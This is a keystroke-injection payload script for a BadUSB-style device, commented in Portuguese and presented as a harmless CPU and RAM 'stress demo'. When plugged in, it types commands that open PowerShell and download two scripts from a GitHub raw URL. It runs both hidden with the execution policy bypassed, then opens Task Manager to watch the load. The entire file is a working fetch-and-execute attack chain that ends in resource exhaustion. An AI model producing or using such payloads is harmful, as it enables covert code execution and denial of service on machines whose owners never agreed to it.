REM ===============================================
REM Inofensivo - só stressa até reiniciar
REM ===============================================

KEYBOARD_LAYOUT win_pt-BR
DELAY 1500
LED_OFF
DISPLAY_CLEAR

REM Initial setup - LED vermelho
DISPLAY_TEXT 10 20 PP_Tech Stress Demo
DISPLAY_TEXT 15 35 Initializing...
LED 255 0 0 200
DELAY 1500

REM Step 1 - Abrir PowerShell
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000

REM Step 2 - Baixar scripts do GitHub RAW para o TEMP
STRING iwr https://raw.githubusercontent.com/bob-reis/lilygo-payloads-demo/main/Scripts/loadram.ps1 -OutFile $env:TEMP\loadram.ps1
ENTER
DELAY 800
STRING iwr https://raw.githubusercontent.com/bob-reis/lilygo-payloads-demo/main/Scripts/loadcpu.ps1 -OutFile $env:TEMP\loadcpu.ps1
ENTER
DELAY 800

REM Step 3 - Executar scripts em segundo plano (invisível)
STRING Start-Process powershell -ArgumentList "-ExecutionPolicy Bypass -File $env:TEMP\loadram.ps1" -WindowStyle Hidden
ENTER
DELAY 300
STRING Start-Process powershell -ArgumentList "-ExecutionPolicy Bypass -File $env:TEMP\loadcpu.ps1" -WindowStyle Hidden
ENTER
DELAY 500

REM Step 4 - Fechar PowerShell (janela principal)
STRING exit
ENTER

REM Step 5 - Abrir Gerenciador de Tarefas
GUI r
DELAY 500
STRING taskmgr
ENTER

REM Step 6 - LED final verde
DELAY 2000
LED 0 255 0 200
DISPLAY_CLEAR
DISPLAY_TEXT 10 20 Stress Demo Running
DISPLAY_TEXT 5 40 Watch CPU & RAM in Task Manager
